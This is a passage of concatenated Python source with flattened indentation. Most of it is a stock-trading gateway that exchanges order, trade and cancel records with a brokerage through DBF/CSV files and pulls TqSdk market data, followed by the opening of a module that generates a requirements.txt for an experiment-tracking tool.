self.gateway.write_log(f'csv批量下单,委托单全成交,成交数:{order.traded}=>{order.volume}')
order.traded = order.volume
self.gateway.write_log(f'csv批量下单,委托更新:{order.__dict__}')
self.gateway.order_manager.on_order(order)
continue
def query_trades(self):
if self.gateway.file_type == 'dbf':
self.query_trades_dbf()
else:
self.query_trades_csv()
def query_trades_dbf(self):
"""dbf文件获取所有成交"""
# fields:['zqgs', 'zjzh', 'zhlx', 'cpbh', 'cpmc', 'dybh', 'dymc', 'cjxh', 'wtph', 'wtxh', 'zqdm', 'zqmc', 'wtfx', 'zqlb', 'ywfl', 'cjrq', 'cjsj', 'cjsl'
# , 'cjjg', 'zfy', 'cjje', 'jysc', 'jybz', 'wtly', 'rybh', 'rymc']
trades_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
try:
# dbf => 股票成交信息
self.gateway.write_log(f'扫描股票成交信息:{trades_dbf}')
table = dbf.Table(trades_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip()!= self.userid: # ["资金账户"]
continue
sys_orderid = str(data.wtxh) # ["委托序号"]
sys_tradeid = str(data.cjxh) # ["成交序号"]
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
                # 如果交易不在本地映射关系中
if trade is None and order is None:
trade_date = str(data.cjrq).strip() #["成交日期"]
trade_time = str(data.cjsj).strip() #["成交时间"]
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip()) # ["委托方向"]
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(), # ["证券代码"]
exchange=EXCHANGE_NAME2VT.get(str(data.jysc).strip()), # ["交易市场"]
orderid=sys_tradeid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data.cjjg), # ["成交价格"]
volume=float(data.cjsl), # ["成交数量"]
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data.cjje), # ["成交金额"]
commission=float(data.zfy) # ["总费用"]
)
self.trades[sys_tradeid] = trade
self.gateway.on_trade(copy.copy(trade))
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票成交异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_trades_csv(self):
"""获取所有成交"""
# 所有成交的文件
if self.gateway.pb_version == '2018':
trades_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
else:
trades_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('trades'),
self.trading_date)))
# csv => 所有成交记录
trade_list = self.get_data(trades_csv)
if not trade_list:
return
for data in trade_list:
if data["资金账户"] != self.userid:
continue
sys_orderid = str(data["委托序号"])
sys_tradeid = str(data["成交序号"])
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
            # 如果交易不在本地映射关系中
if trade is None and order is None:
trade_date = data["成交日期"]
trade_time = data["成交时间"]
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(data["委托方向"])
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=data["证券代码"],
exchange=EXCHANGE_NAME2VT.get(data["交易市场"]),
orderid=sys_tradeid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data["成交价格"]),
volume=float(data["成交数量"]),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data["成交金额"]),
commission=float(data["总费用"])
)
self.trades[sys_tradeid] = trade
self.gateway.on_trade(copy.copy(trade))
continue
def query_update_trades_dbf(self):
"""获取接口的dbf成交更新"""
# 所有成交的dbf文件
trades_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_trades'),
self.trading_date)))
try:
# dbf => 所有成交记录
self.gateway.write_log(f'扫描所有成交记录:{trades_dbf}')
table = dbf.Table(trades_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# 本地委托号
local_orderid = str(data.wbzdyxh).strip()
if 0 < len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
# 系统委托号
sys_orderid = str(data.wtxh).strip()
# 系统交易号
sys_tradeid = str(data.cjbh).strip()
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
                # 如果交易不在本地映射关系中
if trade is None and order:
trade_date = str(data.cjrq).strip()
trade_time = str(data.cjsj).strip()
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_ORDER_PB2VT.get(str(data.wtfx).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(),
exchange=EXCHANGE_PB2VT.get(str(data.jysc).strip()),
orderid=local_orderid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(data.cjjg),
volume=int(data.cjsl),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(data.cjje),
commission=float(data.zfy),
holder_id=str(data.gddm).strip()
)
# 保存交易记录
self.trades[sys_tradeid] = trade
# 更新订单的成交数量
if order.volume >= order.traded + trade.volume:
pre_traded = order.traded
order.traded += trade.volume
self.gateway.write_log(
f'{local_orderid}/{sys_orderid} 成交数量:{pre_traded} =>{order.traded} ,目标:{order.volume}')
# 发送成交更新
self.gateway.on_trade(copy.copy(trade))
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询成交库异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_update_trades_csv(self):
"""获取接口的csv成交更新"""
# 所有成交的csv文件
trades_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('update_trades'),
self.trading_date)))
# csv => 所有成交记录
trade_list = self.get_data(trades_csv, field_names=UPDATE_TRADE_FIELDS.keys())
if not trade_list:
return
for data in trade_list:
local_orderid = str(data["WBZDYXH"]).lstrip()
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
sys_orderid = str(data["WTXH"]).lstrip()
sys_tradeid = str(data["CJBH"]).lstrip()
# 检查是否存在本地trades缓存中
trade = self.trades.get(sys_tradeid, None)
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
            # 如果交易不在本地映射关系中
if trade is None and order:
trade_date = str(data["CJRQ"]).lstrip()
trade_time = str(data["CJSJ"]).lstrip()
trade_dt = datetime.strptime(f'{trade_date} {trade_time}', "%Y%m%d %H%M%S")
                direction = DIRECTION_ORDER_PB2VT.get(str(data["WTFX"]).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
trade = TradeData(
gateway_name=self.gateway_name,
symbol=str(data["ZQDM"]).lstrip(),
exchange=EXCHANGE_PB2VT.get(str(data["JYSC"]).lstrip()),
orderid=local_orderid,
tradeid=sys_tradeid,
sys_orderid=sys_orderid,
accountid=self.userid,
direction=direction,
offset=offset,
price=float(str(data["CJJG"]).lstrip()),
volume=float(str(data["CJSL"]).lstrip()),
datetime=trade_dt,
time=trade_dt.strftime('%H:%M:%S'),
trade_amount=float(str(data["CJJE"]).lstrip()),
commission=float(str(data["ZFY"]).lstrip()),
holder_id=str(data['GDDM']).lstrip()
)
# 保存交易记录
self.trades[sys_tradeid] = trade
# 更新订单的成交数量
if order.volume >= order.traded + trade.volume:
pre_traded = order.traded
order.traded += trade.volume
self.gateway.write_log(
f'{local_orderid}/{sys_orderid} 成交数量:{pre_traded} =>{order.traded} ,目标:{order.volume}')
# 发送成交更新
self.gateway.on_trade(copy.copy(trade))
continue
def check_send_order_dbf(self):
"""检查更新委托文件dbf"""
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
try:
table = dbf.Table(dbf_file, codepage='cp936')
table.open(dbf.READ_ONLY)
for record in table:
local_orderid = str(record.wbzdyxh)
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
if local_orderid not in self.unchecked_orderids:
continue
# 从本地order_manager中获取order
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
# 判断order取不到,或者order状态不是SUBMITTING
if order is None or order.status != Status.SUBMITTING:
continue
# 检查是否具有系统委托编号
if order.sys_orderid == "":
sys_orderid = str(getattr(record, 'wtxh', ''))
if len(sys_orderid) == 0:
continue
# 委托失败标志
if sys_orderid == "0":
err_msg = record.sbyy
if isinstance(err_msg, bytes):
err_msg = err_msg.decode('gbk')
if len(err_msg) == 0 or record.wtsbdm == 0:
self.gateway.write_log(f'收到失败,又没有失败原因')
continue
err_id = str(getattr(record, 'wtsbdm', '')).strip()
order.status = Status.REJECTED
self.gateway.write_log(f'dbf批量下单,委托被拒:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_error(msg=f'{order.direction.value},{order.vt_symbol},{err_msg}',
error={"ErrorID": err_id, "ErrorMsg": "委托失败"})
if sys_orderid != '0':
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid,
sys_orderid=sys_orderid)
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.gateway.write_log(f'绑定本地local_orderid:{local_orderid} <=>sys_orderid:{sys_orderid}')
self.gateway.write_log(f'dbf批量下单,委托接受:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_log(f'委托成功')
# 移除检查的id
self.gateway.write_log(f'本地委托单更新检查完毕,移除{local_orderid}')
self.unchecked_orderids.remove(local_orderid)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询系统委托号异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def check_send_order_csv(self):
"""检查更新委托文件csv"""
# 当日send_order的文件
send_order_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('send_order'),
self.trading_date)))
# csv => 所有send_order记录
order_list = self.get_data(send_order_csv, field_names=SEND_ORDER_FIELDS.keys())
# 逐一处理
for data in order_list:
local_orderid = data.get('WBZDYXH', "").lstrip(' ')
            if local_orderid == "":
continue
if local_orderid not in self.unchecked_orderids:
continue
# 从本地order_manager中获取order
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
# 判断order取不到,或者order状态不是SUBMITTING
if order is None or order.status != Status.SUBMITTING:
continue
# 检查是否具有系统委托编号
if order.sys_orderid == "":
sys_orderid = data.get('WTXH', '').lstrip(' ')
if len(sys_orderid) == 0:
continue
err_msg = data.get('SBYY', '').lstrip(' ')
# 委托失败标志
if sys_orderid == "0":
if len(err_msg) == 0:
                        self.gateway.write_log(f'收到失败标志,但没有失败原因:{print_dict(data)}')
continue
err_id = data.get('WTSBDM', '').lstrip(' ')
order.status = Status.REJECTED
self.gateway.write_log(f'csv批量下单,委托被拒:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_error(msg=err_msg, error={"ErrorID": err_id, "ErrorMsg": "委托失败"})
if sys_orderid != '0':
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.gateway.write_log(f'csv批量下单,委托被接受:{order.__dict__}')
self.gateway.order_manager.on_order(order)
self.gateway.write_log(f'委托成功')
# 移除检查的id
self.gateway.write_log(f'本地委托单更新检查完毕,移除{local_orderid}')
self.unchecked_orderids.remove(local_orderid)
def send_order(self, req: OrderRequest):
"""委托发单"""
self.gateway.write_log(f'委托发单:{req.__dict__}')
if self.gateway.file_type == 'dbf':
return self.send_order_dbf(req)
else:
return self.send_order_csv(req)
def send_order_dbf(self, req: OrderRequest):
"""通过dbf文件进行发单"""
# 发生委托,才添加批量埋单接口的委托、成交检查
if self.query_update_trades_dbf not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_trades_dbf)
if self.query_update_orders_dbf not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_orders_dbf)
# 创建本地orderid(str格式, HHMM+00序列号)
local_orderid = self.gateway.order_manager.new_local_orderid()
# req => order
order = req.create_order_data(orderid=local_orderid, gateway_name=self.gateway_name)
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
# 股票买卖,强制offset = Offset.NONE
order.offset = Offset.NONE
contract = self.gateway.md_api.contract_dict.get(f'{order.symbol}.{order.exchange.value}')
direction = DIRECTION_STOCK_VT2PB.get((order.direction, order.offset)) # 委托方向
if contract:
if contract.product == Product.BOND:
if direction == '1':
direction = '3'
else:
direction = '4'
data = (
self.product_id, # "CPBH": "C32", # 产品代码/基金代码 <-- 输入参数 -->
self.unit_id, # "ZCDYBH": "C16", # 单元编号/组合编号
self.unit_id, # "ZHBH": "C16", # 组合编号
self.holder_ids.get(order.exchange), # "GDDM": "C20", # 股东代码
EXCHANGE_VT2PB.get(order.exchange), # "JYSC": "C3", # 交易市场
order.symbol, # "ZQDM": "C16", # 证券代码
direction, # "WTFX": "C4", # 委托方向
get_pb_order_type(order.exchange, order.type), # "WTJGLX": "C1", # 委托价格类型
round(order.price, 2), # "WTJG": "N11.4", # 委托价格
int(order.volume), # "WTSL": "N12", # 委托数量
local_orderid, # "WBZDYXH": "N9", # 第三方系统自定义号( 如果字符串不是数字,会报错,如果前面有0,自动去掉)
None, # "WTXH": "N8", # 委托序号 <-- 输出参数 -->
None, # "WTSBDM": "N8", # 委托失败代码
"", # "SBYY": "C254", # 失败原因
"", # "CLBZ": "C1", # 处理标志 <-- 内部自用字段 -->
"", # "BYZD": "C2", # 备用字段
0, # "WTJE": "N16.2", # 委托金额 <-- 扩充参数 -->
"", # "TSBS": "C64", # 特殊标识
"" # "YWBS": "C2", # 业务标识
)
try:
# 打开dbf文件=》table
table = dbf.Table(dbf_file)
# 读取、写入模式
table.open(dbf.READ_WRITE)
# 写入数据
table.append(data)
# 关闭dbf文件
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf添加发单记录异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return ""
# 设置状态为提交中
order.status = Status.SUBMITTING
# 添加待检查列表
self.unchecked_orderids.append(local_orderid)
# 登记并发送on_order事件
self.gateway.write_log(f'send_order,提交dbf委托:{order.__dict__}')
self.gateway.order_manager.on_order(order)
# 添加定时检查任务
if self.check_send_order_dbf not in self.gateway.query_functions:
self.gateway.write_log(f'添加扫描系统委托号任务到任务队列中')
self.gateway.query_functions.append(self.check_send_order_dbf)
return order.vt_orderid
def send_order_csv(self, req: OrderRequest):
"""csv文件格式委托"""
# 发生委托,才添加批量埋单接口的委托、成交检查
if self.query_update_trades_csv not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_trades_csv)
if self.query_update_orders_csv not in self.gateway.query_functions:
self.gateway.query_functions.append(self.query_update_orders_csv)
# 创建本地orderid
local_orderid = self.gateway.order_manager.new_local_orderid()
# req => order
order = req.create_order_data(orderid=local_orderid, gateway_name=self.gateway_name)
csv_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(PB_FILE_NAMES.get('send_order'), self.trading_date)))
# 股票买卖,强制offset = Offset.NONE
order.offset = Offset.NONE
contract = self.gateway.md_api.contract_dict.get(f'{order.symbol}.{order.exchange.value}')
direction = DIRECTION_STOCK_VT2PB.get((order.direction, order.offset)) # 委托方向
if contract:
if contract.product == Product.BOND:
if direction == '1':
direction = '3'
else:
direction = '4'
data = {
"CPBH": self.product_id, # 产品代码/基金代码 <-- 输入参数 -->
"ZCDYBH": self.unit_id, # 单元编号/组合编号
"ZHBH": self.unit_id, # 组合编号
"GDDM": self.holder_ids.get(order.exchange), # 股东代码
"JYSC": EXCHANGE_VT2PB.get(order.exchange), # 交易市场
"ZQDM": order.symbol, # 证券代码
"WTFX": direction,
"WTJGLX": get_pb_order_type(order.exchange, order.type), # 委托价格类型
"WTJG": round(order.price, 4), # 委托价格
"WTSL": int(order.volume), # 委托数量
"WBZDYXH": local_orderid # 第三方系统自定义号
}
        # 更新所有字段的长度
order_data = format_dict(data, SEND_ORDER_FIELDS)
append_data(file_name=csv_file,
dict_data=order_data,
field_names=list(SEND_ORDER_FIELDS.keys()),
auto_header=False,
encoding='gbk')
# 设置状态为提交中
order.status = Status.SUBMITTING
# 添加待检查列表
self.unchecked_orderids.append(local_orderid)
# 登记并发送on_order事件
self.gateway.write_log(f'send_order,提交csv下单:{order.__dict__}')
self.gateway.order_manager.on_order(order)
# 添加定时检查任务
if self.check_send_order_csv not in self.gateway.query_functions:
self.gateway.write_log(f'添加定时检查到任务队列中')
self.gateway.query_functions.append(self.check_send_order_csv)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
if self.gateway.file_type == 'dbf':
return self.cancel_order_dbf(req)
else:
return self.cancel_order_csv(req)
def cancel_order_dbf(self, req: CancelRequest):
"""
dbf文件撤单
:param req:
:return:
"""
self.gateway.write_log(f'dbf委托撤单:{req.__dict__}')
try:
# 获取订单
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid=req.orderid)
# 订单不存在
if order is None:
self.gateway.write_error(f'订单{req.orderid}不存在, 撤单失败')
return False
# 或者已经全部成交,已经被拒单,已经撤单
if order.status in [Status.ALLTRADED, Status.REJECTED, Status.CANCELLING,
Status.CANCELLED]:
self.gateway.write_error(f'订单{req.orderid}存在, 状态为:{order.status}, 不能再撤单')
return False
sys_orderid = self.gateway.order_manager.get_sys_orderid(req.orderid)
if sys_orderid is None or len(sys_orderid) == 0:
self.gateway.write_error(f'订单{req.orderid}=》系统委托id不存在,撤单失败')
return False
data = (
int(sys_orderid), # system order number
None, # "JYSC": "C3", # exchange market
None, # "ZQDM": "C16", # security code
None, # "CDCGBZ": "C1", # cancel-success flag
None, # "SBYY": "C254", # failure reason
None, # "CLBZ": "C1", # processing flag
None, # "BYZD": "C2", # reserved field
None # "BYZD2": "C16", # reserved field 2
)
dbf_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
# Open the dbf file as a table
table = dbf.Table(dbf_file)
# Open in read/write mode
table.open(dbf.READ_WRITE)
# Append the cancel record
table.append(data)
# Close the dbf file
table.close()
return True
except Exception as ex:
self.gateway.write_error(f'dbf委托撤单异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return False
def cancel_order_csv(self, req: CancelRequest):
"""csv文件撤单"""
self.gateway.write_log(f'处理撤单请求{req.__dict__}')
# Look up the order
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid=req.orderid)
# Order does not exist
if order is None:
self.gateway.write_log(f'订单{req.orderid}不存在, 撤单失败')
return False
# Or it has already been fully traded, rejected, or cancelled
if order.status in [Status.ALLTRADED, Status.REJECTED, Status.CANCELLING,
Status.CANCELLED]:
self.gateway.write_log(f'订单{req.orderid}存在, 状态为:{order.status}, 不能再撤单')
return False
sys_orderid = self.gateway.order_manager.get_sys_orderid(req.orderid)
if sys_orderid is None or len(sys_orderid) == 0:
self.gateway.write_log(f'订单{req.orderid}=》系统委托id不存在,撤单失败')
return False
data = {
"WTXH": sys_orderid, # 委托序号
}
# Format every field to its required length
cancel_data = format_dict(data, CANCEL_ORDER_FIELDS)
csv_file = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
append_data(file_name=csv_file,
dict_data=cancel_data,
field_names=list(CANCEL_ORDER_FIELDS.keys()),
auto_header=False,
encoding='gbk')
return True
def cancel_all(self):
if self.gateway.file_type == 'dbf':
return self.cancel_all_dbf()
else:
return self.cancel_all_csv()
def cancel_all_dbf(self):
"""dbf文件全策略单d"""
# dbf file of the XHPT_WTCX order query
orders_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
cancel_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(PB_FILE_NAMES.get('cancel_order'),
self.trading_date)))
# dbf => all order records
try:
# Iterate over every order record in the query file
self.gateway.write_log(f'全撤单,扫描所有委托查询记录:{orders_dbf}')
orders_table = dbf.Table(orders_dbf, codepage='cp936')
orders_table.open(dbf.READ_ONLY)
cancel_table = dbf.Table(cancel_dbf, codepage='cp936')
cancel_table.open(dbf.READ_WRITE)
for data in orders_table:
# Map the order status
order_status = STATUS_PB2VT.get(str(data.wtzt))
# System order number returned by the HengSheng platform
sys_orderid = str(data.wtxh)
if order_status in [Status.NOTTRADED] and len(sys_orderid) > 0:
self.gateway.write_log(f'撤单:{data.wtxh}')
cancel_data = (int(sys_orderid), None, None, None, None, None, None, None)
cancel_table.append(cancel_data)
orders_table.close()
cancel_table.close()
except Exception as ex:
self.gateway.write_error(f'dbf全委托撤单异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
return False
def cancel_all_csv(self):
pass
class TqMdApi():
"""天勤行情API"""
def __init__(self, gateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.api = None
self.is_connected = False
self.subscribe_array = []
# List of quote objects
self.quote_objs = []
# Data update thread
self.update_thread = None
# All contracts
self.all_instruments = []
self.ticks = {}
def connect(self, setting={}):
""""""
if self.api and self.is_connected:
self.gateway.write_log(f'天勤行情已经接入,无需重新连接')
return
try:
from tqsdk import TqApi
self.api = TqApi(_stock=True, url="wss://api.shinnytech.com/t/nfmd/front/mobile")
except Exception as e:
self.gateway.write_log('天勤股票行情API接入异常:{}'.format(str(e)))
self.gateway.write_log(traceback.format_exc())
if self.api:
self.is_connected = True
self.gateway.write_log(f'天勤股票行情API已连接')
self.update_thread = Thread(target=self.update)
self.update_thread.start()
def generate_tick_from_quote(self, vt_symbol, quote) -> TickData:
"""
Build a TickData object from a TqSdk quote
"""
# Replace NaN values with 0 (NaN is the only value not equal to itself)
quote = {k: 0 if v != v else v for k, v in quote.items()}
symbol, exchange = extract_vt_symbol(vt_symbol)
return TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(quote["datetime"], "%Y-%m-%d %H:%M:%S.%f"),
name=symbol,
volume=quote["volume"],
open_interest=quote["open_interest"],
last_price=quote["last_price"],
limit_up=quote["upper_limit"],
limit_down=quote["lower_limit"],
open_price=quote["open"],
high_price=quote["highest"],
low_price=quote["lowest"],
pre_close=quote["pre_close"],
bid_price_1=quote["bid_price1"],
bid_price_2=quote["bid_price2"],
bid_price_3=quote["bid_price3"],
bid_price_4=quote["bid_price4"],
bid_price_5=quote["bid_price5"],
ask_price_1=quote["ask_price1"],
ask_price_2=quote["ask_price2"],
ask_price_3=quote["ask_price3"],
ask_price_4=quote["ask_price4"],
ask_price_5=quote["ask_price5"],
bid_volume_1=quote["bid_volume1"],
bid_volume_2=quote["bid_volume2"],
bid_volume_3=quote["bid_volume3"],
bid_volume_4=quote["bid_volume4"],
bid_volume_5=quote["bid_volume5"],
ask_volume_1=quote["ask_volume1"],
ask_volume_2=quote["ask_volume2"],
ask_volume_3=quote["ask_volume3"],
ask_volume_4=quote["ask_volume4"],
ask_volume_5=quote["ask_volume5"],
gateway_name=self.gateway_name
)
def update(self) -> None:
"""
Update quotes / orders / accounts / positions
"""
while self.api.wait_update():
# Update market data
for vt_symbol, quote in self.quote_objs:
if self.api.is_changing(quote):
tick = self.generate_tick_from_quote(vt_symbol, quote)
if tick:
    self.gateway.on_tick(tick)
    self.gateway.on_custom_tick(tick)
def subscribe(self, req: SubscribeRequest) -> None:
"""
Subscribe to market data
"""
if req.vt_symbol not in self.subscribe_array:
symbol, exchange = extract_vt_symbol(req.vt_symbol)
try:
quote = self.api.get_quote(f'{exchange.value}.{symbol}')
self.quote_objs.append((req.vt_symbol, quote))
self.subscribe_array.append(req.vt_symbol)
except Exception as ex:
self.gateway.write_log('订阅天勤行情异常:{}'.format(str(ex)))
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""
Query historical bar data
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
# Parameters in the form TqSdk expects
tq_symbol = f'{exchange.value}.{symbol}'
tq_interval = INTERVAL_VT2TQ.get(interval)
end += timedelta(1)
total_days = end - start
# At most 8964 bars can be downloaded in one request
min_length = min(8964, total_days.days * 500)
df = self.api.get_kline_serial(tq_symbol, tq_interval, min_length).sort_values(
by=["datetime"]
)
# Align timestamps
df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
# Filter by start/end time
df = df[(df["datetime"] >= start - timedelta(days=1)) & (df["datetime"] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("close_oi", 0),
gateway_name=self.gateway_name,
)
data.append(bar)
return data
def close(self) -> None:
""""""
try:
if self.api and self.api.wait_update():
self.api.close()
self.is_connected = False
if self.update_thread:
self.update_thread.join()
except Exception as e:
self.gateway.write_log('退出天勤行情api异常:{}'.format(str(e)))
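# ---------------------------------------------------------------------------
# Illustrative note: generate_tick_from_quote() above replaces NaN fields with
# 0 by exploiting the fact that NaN is the only value not equal to itself.
# A minimal standalone demonstration of that idiom:
def _demo_clean_nan():
    quote = {"last_price": 10.5, "bid_price1": float("nan")}
    cleaned = {k: 0 if v != v else v for k, v in quote.items()}
    assert cleaned == {"last_price": 10.5, "bid_price1": 0}
    return cleaned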
|
scriptinfo.py
|
import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self):
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(module_callback=ScriptRequirements.add_trains_used_packages)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except Exception:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
